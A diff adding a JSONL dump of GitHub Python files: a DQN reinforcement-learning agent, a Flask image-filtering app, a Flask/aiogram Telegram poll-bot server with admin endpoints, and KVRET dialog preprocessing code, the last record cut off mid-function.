diff --git "a/5149.jsonl" "b/5149.jsonl" new file mode 100644--- /dev/null +++ "b/5149.jsonl" @@ -0,0 +1,2027 @@ +{"seq_id":"23711562511","text":"import numpy as np\nimport random\nimport torch\nfrom torch.nn import functional\nfrom torch import optim\nfrom collections import deque\n\nfrom model import QNetwork, DuelingQNetwork\n\n\nclass Agent(object):\n def __init__(self, state_size, action_size, mem_length=100000, ddqn=True):\n self.gamma = 0.99\n self.batch_size = 64\n self.action_size = action_size\n self.ddqn = ddqn\n\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n if ddqn:\n self.model = DuelingQNetwork(state_size, action_size).to(self.device)\n self.target_model = DuelingQNetwork(state_size, action_size).to(self.device)\n self.optimizer = optim.Adam(self.model.parameters(), lr=5e-4)\n self.experience = self.ddqn_experience\n else:\n self.model = QNetwork(state_size, action_size).to(self.device)\n self.optimizer = optim.Adam(self.model.parameters(), lr=5e-4)\n self.experience = self.dqn_experience\n\n # replay memory\n self.memory = deque(maxlen=mem_length) \n\n def act(self, state, eps=0):\n # epsilon greedy \n if random.random() < eps:\n return random.choice(np.arange(self.action_size))\n\n # state to predict action from\n state = torch.FloatTensor(state).unsqueeze(0).to(self.device)\n\n self.model.eval()\n with torch.no_grad():\n action_values = self.model(state)\n \n self.model.train()\n return np.argmax(action_values.cpu().data.numpy())\n \n def ddqn_experience(self, state, action, reward, next_state, done):\n self.memory.append((state, action, reward, next_state, done))\n if len(self.memory) < self.batch_size:\n return \n\n # get random batch\n states, actions, rewards, next_states, terminals = self.get_batch()\n\n # Get expected Q values from local model\n expected = self.model(states).gather(1, actions) \n Q = self.model(next_states).detach()\n\n # Get max predicted Q values (for next states) from target model\n targets_next = self.target_model(next_states).detach()\n targets_next = targets_next.gather(1, Q.max(1)[1].unsqueeze(1))\n\n # Compute Q targets for current states \n targets = rewards + (self.gamma * targets_next * (1 - terminals))\n \n # compute loss\n loss = functional.mse_loss(expected, targets)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n # update target network\n lr = 0.001\n for target_param, primary_param in zip(self.target_model.parameters(), self.model.parameters()):\n target_param.data.copy_(lr * primary_param.data + (1-lr) * target_param.data) \n\n def dqn_experience(self, state, action, reward, next_state, done):\n self.memory.append((state, action, reward, next_state, done))\n if len(self.memory) < self.batch_size:\n return \n\n # get random batch\n states, actions, rewards, next_states, terminals = self.get_batch()\n\n Q = self.model.forward(states)\n Q = Q.gather(1, actions).squeeze(1)\n next_Q = self.model.forward(next_states)\n max_next_Q = torch.max(next_Q, 1)[0]\n expected = rewards.squeeze(1) + self.gamma * max_next_Q\n\n # update model\n loss = functional.mse_loss(Q, expected)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n def get_batch(self):\n experiences = np.array(random.sample(self.memory, k=self.batch_size))\n experiences = [np.vstack(experiences[:, i]) for i in range(5)]\n\n # convert data to tensors\n states = torch.FloatTensor(experiences[0]).to(self.device)\n actions = torch.LongTensor(experiences[1]).to(self.device)\n rewards = torch.FloatTensor(experiences[2]).to(self.device)\n next_states = torch.FloatTensor(experiences[3]).to(self.device)\n terminals = torch.FloatTensor(experiences[4].astype(np.uint8)).to(self.device)\n\n return states, actions, rewards, next_states, terminals\n","repo_name":"SC4RECOIN/DQN","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"24877023958","text":"# Modules nécessaires\nfrom flask import Flask, request, render_template, send_from_directory\nfrom PIL import Image\nimport random\nimport requests\n\n# Application serveur web\napp = Flask(__name__)\n\n# Dossier de téléchargement des images\n# app.root_path permet de connaître le chemin physique de notre application\ndossierImages = app.root_path + '/static/'\n\n# Chargement de l'Hermione avec PIL au premier appel et vérification du fonctionnement\nhermione = Image.open(dossierImages + \"hermione.jpg\")\nprint(\"Image de l'Hermione chargée avec succèss \", hermione.size)\n\n# On sauvegarde l'image dans les deux seuls fichiers qui seront servis et affichés sur la page web\nhermione.save(dossierImages + \"originale.jpg\")\nhermione.save(dossierImages + \"traitement.jpg\")\n\n# Fonctions \nfrom traitements import *\n\n\n#image aléatoire\ndef image_web(largeur=400, hauteur=300):\n return Image.open(requests.get(f\"https://picsum.photos/{largeur}/{hauteur}\", stream = True).raw)\n\n# Page d'accueil et d'affichage des images\n@app.route(\"/\" , methods=[\"GET\",\"POST\"])\ndef accueil():\n #choix image selon checkbox cochée ou non\n if request.args.get(\"picsum\") == \"on\":\n originale = image_web()\n originale.save(dossierImages + \"originale.jpg\")\n else:\n originale = hermione\n originale.save(dossierImages + \"originale.jpg\")\n \n\n #image client\n #if request.args.get(\"file\") != \"\":\n #file.save(os.path.join(app.config['UPLOAD_FOLDER'], file.filename))\n\n #gérant du serveur voit le filtre appelé\n print(request.args.get(\"filtre\"))\n\n #application du traitement\n traitee = originale.copy()\n traitee.save(dossierImages + \"traitement.jpg\")\n if request.args.get(\"filtre\") == \"please\":\n traitee = originale.copy()\n traitee.save(dossierImages + \"traitement.jpg\")\n if request.args.get(\"filtre\") == \"bruit\":\n traitee = bruit_30(traitee)\n traitee.save(dossierImages + \"traitement.jpg\")\n if request.args.get(\"filtre\") == \"symAxeVertical\":\n traitee = sym_axe_vertical(traitee)\n traitee.save(dossierImages + \"traitement.jpg\")\n if request.args.get(\"filtre\") == \"variation_s_g\":\n traitee = variation_s_g(traitee)\n traitee.save(dossierImages + \"traitement.jpg\")\n if request.args.get(\"filtre\") == \"filtreEmbossage\":\n traitee = filtreEmbossage(traitee)\n traitee.save(dossierImages + \"traitement.jpg\")\n if request.args.get(\"filtre\") == \"filtreContraste\":\n traitee = filtreContraste(traitee)\n traitee.save(dossierImages + \"traitement.jpg\")\n \n #retour hasard du querystring et page html avec images modifiées ou non\n return render_template(\"index.html\" , hasard=random.randint(1,10000))\n\n\n\n\n# Accès à une image dans le dossier images\n@app.route('/static/')\ndef fichier(filename):\n return send_from_directory(dossierImages + filename, mimetype='image/jpeg')\n\n# Lancement du serveur à l'écoute sur le port 8080\napp.run(host='0.0.0.0', port=8080)","repo_name":"MJ240103/Traitement-Image-NSI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71887998820","text":"from flask import request, jsonify\nimport asyncio\nfrom configuration.config import server_port, local_host, super_admin_token\nfrom db_sqlalchemy.db_functions import *\n\n\nfrom exception_types import DBException\nfrom db_sqlalchemy.manytomany.db_server import myApp\n\nfrom aiogram import Bot, Dispatcher\nfrom flask_cors import cross_origin\n\nimport base64\n\n\n# init DB from scratch\ndef init_DB_from_scratch():\n drop_cascade_all()\n print('Init DB from scratch with super admin')\n insert_admin_and_token(super_admin_name, super_admin_password, super_admin_token)\n\ndef run_app():\n app_obj = myApp()\n app = app_obj.app\n connDBParams_obj = app_obj.connDBParams_obj\n bot = Bot(token=app_obj.MY_TOKEN)\n dp = Dispatcher(bot)\n DBErrorReply = \"DB_error_reply\"\n GeneralErrorReplay = \"general_error_reply\"\n\n init_DB_from_scratch()\n def decode_base64(message_bytes):\n message_bytes = base64.b64decode(message_bytes)\n translated_message = message_bytes.decode('utf-8')\n return translated_message\n def encode_base64(message):\n message_bytes = message.encode('utf-8')\n message_bytes = base64.b64encode(message_bytes)\n message_encrypt = message_bytes.decode('utf-8')\n return message_encrypt\n\n @app.route(\"/\")\n async def index():\n #return request.environ.get('SERVER_PROTOCOL')\n return \"PollsBot Server :)\" \\\n \"\\nSearch PollsBot channel on telegram\"\n\n ## ***********************************************users post ***********************************************\n @app.route('/register_user', methods=['POST'])\n def register_user():\n print('in register user post 1')\n try:\n data = request.get_json(force=True)\n print('in register user post 2')\n print(data)\n chat_id = data['chat_id']\n user_name = data['user_name']\n try:\n is_user = is_a_user(chat_id, user_name)\n if is_user:\n send_back = 'This device is already registered!'\n return jsonify(message_back=send_back)\n insert_user(chat_id, user_name)\n\n send_back = 'You have been registered'\n return jsonify(message_back=send_back)\n\n except DBException as e:\n print(e)\n send_back = DBErrorReply\n return jsonify(message_back=send_back), 400\n\n except Exception as e:\n print(e)\n send_back = GeneralErrorReplay\n return jsonify(message_back=send_back), 500\n\n @app.route('/remove_user', methods=['POST'])\n def remove_user():\n try:\n data = request.get_json(force=True)\n chat_id = data['chat_id']\n user_name = data['user_name']\n print('request is ' + str(data))\n try:\n\n removed = delete_user(chat_id, user_name)\n if removed == 0:\n send_back = 'There isn\\'t a valid user with this name on this device to remove'\n return jsonify(message_back=send_back)\n\n send_back = 'You have been removed :('\n return jsonify(message_back=send_back)\n\n except DBException as e:\n print(e)\n send_back = DBErrorReply\n return jsonify(message_back=send_back), 400\n\n except Exception as e:\n send_back = GeneralErrorReplay\n return jsonify(message_back=send_back), 500\n\n @app.route('/my_name_user', methods=['POST'])\n def my_name():\n try:\n data = request.get_json(force=True)\n chat_id = data['chat_id']\n try:\n\n user_name_exists, user_name = getUserName(chat_id)\n\n if user_name_exists:\n user_name_str = user_name\n send_back = f'User Name is {user_name_str}'\n return jsonify(message_back=send_back)\n else:\n send_back = 'This device isn\\'t registered!'\n return jsonify(message_back=send_back)\n\n except DBException as e:\n print(e)\n send_back = DBErrorReply\n return jsonify(message_back=send_back), 400\n\n except Exception as e:\n send_back = GeneralErrorReplay\n return jsonify(message_back=send_back), 500\n\n @app.route('/user_answer', methods=['POST'])\n def user_answer():\n try:\n data = request.get_json(force=True)\n poll_id_telegram = data['poll_id_telegram']\n chat_id = data['chat_id']\n answer_number = data['answer_number']\n print('poll_id_telegram : ', poll_id_telegram)\n print('chat_id : ', chat_id)\n print('answer_number : ', str(answer_number))\n try:\n id_poll_exists, id_poll = getIdPollByPollIdTelegram(poll_id_telegram)\n print(id_poll_exists, id_poll)\n if id_poll_exists:\n insert_user_answer(chat_id, id_poll, answer_number)\n send_back = 'Answer has been received'\n return jsonify(message_back=send_back)\n else:\n send_back = 'something went wrong :('\n return jsonify(message_back=send_back), 401\n\n except DBException as e:\n print(e)\n send_back = DBErrorReply\n return jsonify(message_back=send_back), 400\n\n except Exception as e:\n send_back = GeneralErrorReplay\n return jsonify(message_back=send_back), 500\n\n ## ***********************************************admin - super admin - post ***********************************************\n # not an UI request\n @app.route('/remove_admin', methods=['POST'])\n def remove_admin():\n try:\n data = request.get_json(force=True)\n admin_name = data['admin_name']\n password = decode_base64(data['password'])\n try:\n if admin_name == super_admin_name and password == super_admin_password:\n removed = delete_admin(admin_name, password)\n if removed == 0:\n send_back = 'There isn\\'t a valid admin with this name on this device to remove'\n return jsonify(message_back=send_back)\n\n send_back = 'Admin have been removed '\n return jsonify(message_back=send_back)\n else:\n send_back = 'You are not the super admin'\n return jsonify(error=send_back)\n\n except DBException as e:\n print(e)\n send_back = DBErrorReply\n return jsonify(error=send_back), 400\n\n except Exception as e:\n send_back = GeneralErrorReplay\n return jsonify(error=send_back), 500\n ## ***********************************************admin post ***********************************************\n @app.route('/login_admin', methods=['POST'])\n @cross_origin()\n def login_admin():\n try:\n data = request.get_json(force=True)\n admin_name = data['admin_name']\n password = decode_base64(data['password'])\n try:\n token_exists, token_name = getTokenAndNameByAdminNamePasswordAndUpdate(admin_name, password)\n if token_exists:\n token = token_name[0]\n token = encode_base64(token)\n admin_name = encode_base64(token_name[1])\n response = jsonify(token=token, admin_name=admin_name)\n print('user logged in')\n return response\n else:\n send_back = \"admin not exists\"\n response = jsonify(error=send_back)\n return response\n except DBException as e:\n print(e)\n send_back = GeneralErrorReplay\n response = jsonify(error=send_back)\n return response\n except Exception as e:\n print(e)\n send_back = GeneralErrorReplay\n response = jsonify(error=send_back)\n # response.headers.add(\"Access-Control-Allow-Origin\", \"*\")\n return response\n\n @app.route('/logout_admin', methods=['POST'])\n @cross_origin()\n def logout_admin():\n try:\n data = request.get_json(force=True)\n token = decode_base64(data['token'])\n try:\n loged_out = logOutAndUpdateToken(token)\n if loged_out:\n response = jsonify(message_back=\"logged out\")\n print('user logged out')\n return response\n else:\n send_back = \"admin not exists\"\n response = jsonify(error=send_back)\n return response\n except DBException as e:\n print(e)\n send_back = GeneralErrorReplay\n response = jsonify(error=send_back)\n return response\n except Exception as e:\n print(e)\n send_back = GeneralErrorReplay\n response = jsonify(error=send_back)\n # response.headers.add(\"Access-Control-Allow-Origin\", \"*\")\n return response\n @app.route('/register_admin', methods=['POST'])\n @cross_origin()\n def register_admin():\n try:\n data = request.get_json(force=True)\n new_admin_name = data['admin_name']\n password = decode_base64(data['password'])\n token = decode_base64(data['token'])\n try:\n if is_a_admin_token(token):\n is_admin = is_a_admin(new_admin_name)\n if is_admin:\n send_back = \"Sorry, admin name already taken, try a different one\"\n response = jsonify(error=send_back)\n return response\n new_token = insert_admin(new_admin_name, password)\n if new_token is not None:\n send_back = new_token\n response = jsonify(token=send_back)\n return response\n else:\n send_back = \"You must be an admin to add admins\"\n response = jsonify(error=send_back)\n return response\n except DBException as e:\n print(e)\n send_back = \"Sorry, admin name already taken, try a different one\"\n response = jsonify(error=send_back)\n return response\n except Exception as e:\n print(e)\n send_back = GeneralErrorReplay\n response = jsonify(error=send_back)\n #response.headers.add(\"Access-Control-Allow-Origin\", \"*\")\n return response\n\n @app.route('/my_name_admin', methods=['POST'])\n def my_name_admin():\n try:\n data = request.get_json(force=True)\n token = decode_base64(data['token'])\n try:\n admin_name_exists, admin_name = getAdminNameByToken(token)\n\n if admin_name_exists:\n admin_name_str = admin_name\n send_back = admin_name_str\n return jsonify(message_back=send_back)\n else:\n send_back = 'This admin isn\\'t registered!'\n return jsonify(error=send_back)\n\n except DBException as e:\n print(e)\n send_back = DBErrorReply\n return jsonify(error=send_back), 400\n\n except Exception as e:\n send_back = GeneralErrorReplay\n return jsonify(error=send_back), 500\n\n @app.route('/admins_name_list', methods=['POST'])\n @cross_origin()\n def admins_name_list():\n try:\n data = request.get_json(force=True)\n token = decode_base64(data['token'])\n try:\n if is_a_admin_token(token):\n admins_list_exists, admins_list = getAdminsList()\n if admins_list_exists:\n send_back = admins_list\n return jsonify(result_lst=send_back)\n else:\n send_back = 'This admin isn\\'t registered!'\n return jsonify(error=send_back)\n else:\n send_back = 'This admin isn\\'t registered!'\n return jsonify(error=send_back)\n\n except DBException as e:\n print(e)\n send_back = DBErrorReply\n return jsonify(error=send_back), 400\n\n except Exception as e:\n send_back = GeneralErrorReplay\n return jsonify(error=send_back), 500\n\n ## ***********************************************poll - super admin - post ***********************************************\n @app.route('/remove_poll', methods=['POST'])\n def remove_poll():\n try:\n data = request.get_json(force=True)\n admin_name = data['admin_name']\n password = decode_base64(data['password'])\n id_poll = data['id_poll']\n try:\n if admin_name == super_admin_name and password == super_admin_password:\n removed = delete_poll(id_poll)\n if removed == 0:\n send_back = 'There isn\\'t a valid admin_poll to remove'\n return jsonify(message_back=send_back)\n\n send_back = 'poll have been removed '\n return jsonify(message_back=send_back)\n else:\n send_back = 'You are not the super admin'\n return jsonify(error=send_back)\n\n except DBException as e:\n print(e)\n send_back = DBErrorReply\n return jsonify(error=send_back), 400\n\n except Exception as e:\n send_back = GeneralErrorReplay\n return jsonify(error=send_back), 500\n\n ## ***********************************************poll post ***********************************************\n async def send_a_poll(users_chat_id_lst, poll_content, numbers_choices_dict):\n\n answers_lst = list(numbers_choices_dict.values())\n poll_id_telegram_lst = []\n # await dp.bot.send_message(1332261387, 'gfgfdgdf')\n for chat_id in users_chat_id_lst: # send poll to all requested users\n try:\n poll_sent = await dp.bot.send_poll(\n chat_id,\n poll_content,\n answers_lst,\n is_anonymous=False,\n allows_multiple_answers=False\n )\n poll_id_telegram = poll_sent[\"poll\"][\"id\"]\n poll_id_telegram_lst.append(poll_id_telegram)\n except Exception as e:\n print(f'user {chat_id} error:')\n print(e)\n return poll_id_telegram_lst\n\n async def send_a_poll_and_register_to_poll_telegram(id_poll, users_chat_id_lst, poll_content, numbers_choices_dict):\n poll_id_telegram_lst = await send_a_poll(users_chat_id_lst, poll_content, numbers_choices_dict)\n for poll_id_telegram in poll_id_telegram_lst:\n insert_poll_telegram(id_poll,\n poll_id_telegram) # token admin exists because registration poll is from the UI\n return True\n\n @app.route('/register_and_send_poll', methods=['POST'])\n @cross_origin()\n def register_and_send_poll():\n try:\n data = request.get_json(force=True)\n token = decode_base64(data['token'])\n poll_content = data['poll_content']\n numbers_choices_dict = transformNumberAnswerListToDict(data['numbers_choices_lst'])\n idPoll_answer_lst = data['idPoll_answer_lst']\n should_union = data['should_union']\n users_chat_id_lst= []\n\n try:\n if is_a_admin_token(token):\n is_idPoll_answer_lst_empty = len(idPoll_answer_lst) == 0 # or 'data' not in idPoll_answer_lst[0]\n if is_idPoll_answer_lst_empty or ('data' in idPoll_answer_lst[0] and idPoll_answer_lst[0]['data'] == \"\"):\n # no filtering\n users_chat_id_lst = getAllUsersChatIdsLst()\n print('This is full list ', users_chat_id_lst)\n else:\n # filter\n users_chat_id_lst = getChatIdLstToSend(idPoll_answer_lst, union=should_union)\n print('This is filter list ', users_chat_id_lst)\n if len(users_chat_id_lst) == 0:\n send_back = 'No users at the mailing list for the poll.\\n' \\\n 'Try other filtering or no filter at all'\n return jsonify(error=send_back)\n # register poll\n id_poll, poll_content = insert_poll(poll_content, numbers_choices_dict)\n insert_admin_poll(token, id_poll) # token admin exists because registration poll is from the UI\n send_back = 'poll have been registered'\n # send a poll\n asyncio.set_event_loop(asyncio.new_event_loop())\n loop = asyncio.get_event_loop()\n res_sending = loop.run_until_complete(send_a_poll_and_register_to_poll_telegram(id_poll, users_chat_id_lst,poll_content, numbers_choices_dict))\n if res_sending:\n send_back = 'Poll has been sent'\n return jsonify(message_back=send_back)\n else:\n send_back = \"Sorry, an error occurred, poll has\\'nt been sent to all users\"\n return jsonify(error=send_back)\n else:\n send_back = \"Sorry, an error occurred, poll has\\'nt been registered\"\n return jsonify(error=send_back)\n except ParsingException as e:\n print(e)\n send_back = \"Error while parsing your input at the server\"\n return jsonify(error=send_back), 400\n except UseException as e:\n print(e)\n send_back = \"Each answer of the poll must be unique!\"\n return jsonify(error=send_back)\n except DBException as e:\n print(e)\n send_back = DBErrorReply\n return jsonify(error=send_back), 400\n\n except Exception as e:\n print(e)\n send_back = GeneralErrorReplay\n return jsonify(error=send_back), 500\n\n\n @app.route('/get_poll_details', methods=['POST'])\n @cross_origin()\n def get_poll_details():\n try:\n data = request.get_json(force=True)\n # token = data['token'] # no need to be admin for poll details\n id_poll = data['id_poll']\n try:\n poll_data_exists, poll_data_dict = getFullPollData(id_poll)\n\n if poll_data_exists:\n send_back = poll_data_dict\n return jsonify(message_back=send_back)\n else:\n send_back = 'This poll isn\\'t registered!'\n return jsonify(error=send_back)\n\n except DBException as e:\n print(e)\n send_back = DBErrorReply\n return jsonify(error=send_back), 400\n\n except Exception as e:\n send_back = GeneralErrorReplay\n return jsonify(error=send_back), 500\n ## ***********************************************data polls and answers post ***********************************************\n @app.route('/get_poll_answers', methods=['POST'])\n @cross_origin()\n def get_poll_answers():\n try:\n data = request.get_json(force=True)\n token = decode_base64(data['token'])\n id_poll = data['id_poll']\n try:\n print(id_poll)\n answers_hist_exists, answers_hist_dict = creatHistogramForSpecificPoll(token, id_poll)\n print(answers_hist_exists, answers_hist_dict)\n\n if answers_hist_exists:\n\n send_back = answers_hist_dict\n return jsonify(message_back=send_back)\n else:\n send_back = 'This poll isn\\'t registered!'\n return jsonify(error=send_back)\n\n except DBException as e:\n print(e)\n send_back = DBErrorReply\n return jsonify(error=send_back), 400\n\n except Exception as e:\n send_back = GeneralErrorReplay\n return jsonify(error=send_back), 500\n\n @app.route('/get_associated_polls', methods=['POST'])\n @cross_origin()\n def get_associated_polls():\n try:\n data = request.get_json(force=True)\n token = decode_base64(data['token'])\n try:\n if is_a_admin_token(token):\n associated_polls_exist, associated_polls = getAssociatesPollsToAdmin(token)\n print(associated_polls_exist, associated_polls)\n if associated_polls_exist:\n if len(associated_polls) == 0:\n send_back = \"You don't have polls yet\"\n return jsonify(error=send_back)\n else:\n send_back = associated_polls\n return jsonify(result_lst=send_back)\n\n else:\n # send_back = \"No polls to filter from\"\n # return jsonify(result_lst=send_back)\n #send_back = [{'poll_content': 'poll1?', 'date': '2022-01-13', 'numbers_answers_lst': ['choice0', 'choice1', 'choice2'], 'id_poll': 1}, {'poll_content': 'poll3?', 'date': '2022-01-13', 'numbers_answers_lst': ['choice0', 'choice1', 'choice2'], 'id_poll': 3}]\n send_back = []\n return jsonify(result_lst=send_back)\n else:\n send_back = \"You Are not An Admin\"\n return jsonify(error=send_back), 404\n\n except DBException as e:\n print(e)\n send_back = DBErrorReply\n return jsonify(error=send_back), 400\n\n except Exception as e:\n send_back = GeneralErrorReplay\n return jsonify(error=send_back), 500\n\n app.run(host=local_host, port=server_port, threaded=True)\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n run_app()\n","repo_name":"nir6760/project_managingData","sub_path":"server/main_server.py","file_name":"main_server.py","file_ext":"py","file_size_in_byte":23016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41948966393","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/2/28 上午10:53\n# @Author : yizhen\n# @Site : \n# @File : datautils.py\n# @Software: PyCharm\n\n#! /usr/bin/python\n# -*- coding: utf-8 -*-\n__author__ = 'uniphix'\n# print ('****************************to be implemented********************************')\nimport json\nimport os\nimport codecs\nfrom collections import defaultdict\nimport copy\nfrom torch.autograd import Variable\nimport torch\nimport itertools\n\nuse_cuda = torch.cuda.is_available()\noov = 1\n\ndef preprocess(path):\n '''\n\n :param dialog:\n :return:\n '''\n with codecs.open(path, 'r', encoding='utf-8') as fo:\n dialogs = json.loads(fo.read())\n fo.close()\n\n knowledge_base = []\n poi_selected = []\n last_num = 0\n for idx,dialog in enumerate(dialogs):\n #if (1):\n kb_flag = True\n if (dialog['scenario']['task']['intent'] == 'navigate'):\n for dialogue in dialog['dialogue']:\n dialogue['data']['utterance'] = dialogue['data']['utterance'] + ' ' #fixme 怎么复制并且共享操作\n if len(dialogue['data']['utterance']) == 0:\n continue\n else:\n dialogue['data']['utterance'] = dialogue['data']['utterance'].lower()\n # if (dialogue['data']['utterance'][-1] == '.') or (dialogue['data']['utterance'][-1] == '?') or \\\n # (dialogue['data']['utterance'][-1] == '!') and (dialogue['data']['utterance'][-2] != ' '):\n # dialogue['data']['utterance'] = dialogue['data']['utterance'][:-1] + ' ' + dialogue['data']['utterance'][-1]\n # elif (dialogue['data']['utterance'][-1] != '.') or (dialogue['data']['utterance'][-1] != '?') \\\n # or (dialogue['data']['utterance'][-1] != '!'):\n # dialogue['data']['utterance'] += ' .'\n dialogue['data']['utterance'] = dialogue['data']['utterance'].replace('. ', ' . ')\n dialogue['data']['utterance'] = dialogue['data']['utterance'].replace('?', ' ?')\n dialogue['data']['utterance'] = dialogue['data']['utterance'].replace('!', ' !')\n dialogue['data']['utterance'] = dialogue['data']['utterance'].replace(',', ' ,')\n if kb_flag == True:\n if 'slots' in dialogue['data']:\n if 'poi_type' in dialogue['data']['slots']:\n poi_selected.append(dialogue['data']['slots']['poi_type'].lower())\n kb_flag = False\n else:\n if 'slots' in dialogue['data']:\n if 'poi_type' in dialogue['data']['slots']:\n poi_selected[-1] = dialogue['data']['slots']['poi_type'].lower()\n # if (len(poi_selected)) == last_num:\n # print (dialogs[idx]);exit(0)\n # last_num = len(poi_selected)\n else:\n dialogs[idx] = None\n if (dialog['scenario']['task']['intent'] == 'navigate'):\n if (dialog['scenario']['kb']['items'] is not None):\n for item in dialog['scenario']['kb']['items']:\n for key in item:\n item[key] = item[key].lower()\n knowledge_base.append(dialog['scenario']['kb']['items'])\n else:\n pass\n dialogs_navi = []\n for item in dialogs:\n if item is not None:\n dialogs_navi.append(item)\n # print (poi_selected)\n # print (len(knowledge_base))\n # print (len(poi_selected));exit(0)\n return dialogs_navi, knowledge_base\n\n\ndef data_preprocess(path):\n '''\n 数据预处理: 把标点和词分开,没有标点的统一加上.\n :param path:\n :return:\n '''\n\n train_path = os.path.join(path, 'kvret_train_public.json')\n valid_path = os.path.join(path, 'kvret_dev_public.json')\n test_path = os.path.join(path, 'kvret_test_public.json')\n\n # train_path = os.path.join(path, 'test.json')\n # valid_path = os.path.join(path, 'test.json')\n # test_path = os.path.join(path, 'test.json')\n return preprocess(train_path), preprocess(valid_path), preprocess(test_path)\n\n\n\ndef key_extraction(train_dialogs, path):\n '''\n 提取keys, triples, entities, kb\n :param train_dialogs:\n :return:\n '''\n keys = set()\n value_to_abstract_keys = {}\n triples = defaultdict(lambda :defaultdict(int)) #双层dict #fixme\n knowledge_base = []\n with codecs.open(os.path.join(path, 'kvret_entities.json'), 'r', encoding='utf-8') as fo:\n entities = json.loads(fo.read())\n\n for dialog in train_dialogs:\n if dialog is not None:\n if (dialog['scenario']['kb']['items']) is not None:\n domin = dialog['scenario']['kb']['kb_title']\n primary_key = ''\n if (domin == 'location information'):\n primary_key = 'poi'\n elif (domin == \"weekly forecast\"):\n primary_key = 'location'\n elif (domin == \"calendar\"):\n primary_key = 'event'\n for item in dialog['scenario']['kb']['items']: # item是一个包含键值信息的dict\n subject = item[primary_key]\n for (relation, value) in item.items():\n value = value.lower()\n key = (subject, relation) = (subject.lower(), relation.lower())\n keys.add(key)\n triples[key][value] += 1\n value_to_abstract_keys[value] = \"<\" + '_'.join(key[0].split()) + \":\" + \"_\".join(key[1].split()) + '>' #fixme\n\n return keys, triples, entities, value_to_abstract_keys\n\n\ndef key_to_idx(lang, underlined_keys):\n '''\n\n :param lang:\n :param underlined_keys:\n :return:\n '''\n keys_idx = []\n for (key_0, key_1) in underlined_keys:\n (key_0_ul, key_1_ul) = ([lang.word2idx[key_0]],[lang.word2idx[key_1]])\n keys_idx.append((key_0_ul, key_1_ul))\n keys_idx = Variable(torch.LongTensor(keys_idx))\n keys_idx = keys_idx.cuda() if use_cuda else keys_idx\n return keys_idx\n\n\nclass Lang:\n def __init__(self):\n self.word2idx = {'pad':0, 'oov':1, '':2, '':3}\n self.idx2word = {}\n self.word_size = 4\n\n def add_word(self, word):\n '''\n add word to dict\n :param word:\n :return:\n '''\n if word not in self.word2idx:\n self.word2idx[word] = len(self.word2idx)\n self.word_size += 1\n\n def add_sentence(self, sentence):\n '''\n add sentence to dict\n :param sentence:\n :return:\n '''\n for word in sentence.strip().split():\n self.add_word(word)\n\n def get_idx_to_word(self):\n '''\n get idx_to_word\n :return:\n '''\n self.idx2word = {idx:word for word, idx in self.word2idx.items()}\n return self.idx2word\n\n def sentence_to_idx(self, sentence):\n '''\n '''\n return [self.word2idx.get(word, 1) for word in sentence.split()]\n\n\ndef generate_dict(keys, train_dialogs, lang, value_to_abstract_keys):\n '''\n 生成词典,先将key变成下划线形式加入词典,再将对话将入词典\n :param keys:\n :param train_dialogs:\n :param lang:\n :return:\n '''\n underlined_keys = []\n for key in keys:\n key_0 = '_'.join(key[0].split())\n key_1 = '_'.join(key[1].split())\n lang.add_word(key_0)\n lang.add_word(key_1)\n underlined_keys.append((key_0,key_1))\n\n for dialog in train_dialogs:\n if dialog is not None:\n for dialogue in dialog['dialogue']:\n lang.add_sentence(dialogue['data']['utterance'])\n\n for (value, key) in value_to_abstract_keys.items():\n lang.add_word(key)\n\n return lang, underlined_keys\n\ndef generate_dict_manual(lang, path):\n '''\n 将手动的数据加入字典中,原来已经加过了,但是这里手动改了数据,防止不必要的错误,这里进行加上。\n :param lang:\n :param path:\n :return:\n '''\n train_path = os.path.join(path,'train.txt')\n with codecs.open(train_path, 'r', encoding='utf-8') as fp:\n fp_content = fp.read().strip().split('\\n\\n')\n for dialog in fp_content:\n for sentence in dialog.strip().split('\\n'):\n lang.add_sentence(sentence)\n return lang\n\ndef normalize_key(sentence, keys):\n '''\n 把句子中出现的key替换成抽象的key\n :param sentence:\n :param keys:\n :return:\n '''\n sentence = copy.deepcopy(sentence)\n for key in keys:\n sentence = sentence.replace(key[0], '_'.join(key[0].split()))\n sentence = sentence.replace(key[1], '_'.join(key[1].split()))\n return sentence\n\n\ndef noralize_value(sentence, value_to_abstract_keys):\n '''\n 把句子中出现的value替换成对应的抽象的<:>\n :param sentence:\n :return:\n '''\n sentence = copy.deepcopy(sentence)\n for value in value_to_abstract_keys:\n sentence = sentence.replace(' ' + value, ' ' + value_to_abstract_keys[value]) # fixme\n return sentence\n\ndef generate_instances_manual(path, type, kb):\n '''\n generate instances\n 生成形如[((u1 s1 u2, s2),kb),...]的数据\n :param path: manual data path\n :param type: train、valid、test\n :return:\n '''\n data_path = os.path.join(path, type+'.txt')\n with codecs.open(data_path, 'r' ,encoding='utf-8') as fp:\n train_dialogs = fp.read().strip().split('\\n\\n')\n instances = []\n for num, dialog in enumerate(train_dialogs):\n if (dialog == None):\n continue\n else:\n dialog = dialog.strip().split('\\n')\n if len(dialog) % 2 != 0: # if illegal, drop it\n continue\n instance_2 = []\n if dialog is not None:\n flag = True\n for idx, dialogue in enumerate(dialog):\n if idx % 2 == 1:\n output_sentence = dialogue\n # instance_2.append(output_sentence)\n instance_1 = (input_sentence, output_sentence)\n instances.append((instance_1, kb_normalization(kb[num])))\n # instances.append((instance_1, copy.deepcopy(instance_2)))\n input_sentence += ' '\n elif idx % 2 == 0:\n input_sentence_2 = dialogue\n instance_2.append(input_sentence_2)\n if flag:\n input_sentence = ''\n flag = False\n pass\n else:\n input_sentence += ' '\n input_sentence += dialogue\n return instances\n\n\ndef kb_normalization(kb):\n '''\n 标准化kb的表示\n :param kb:\n :return:\n '''\n norm_kb = []\n for row in kb:\n norm_row = []\n poi = 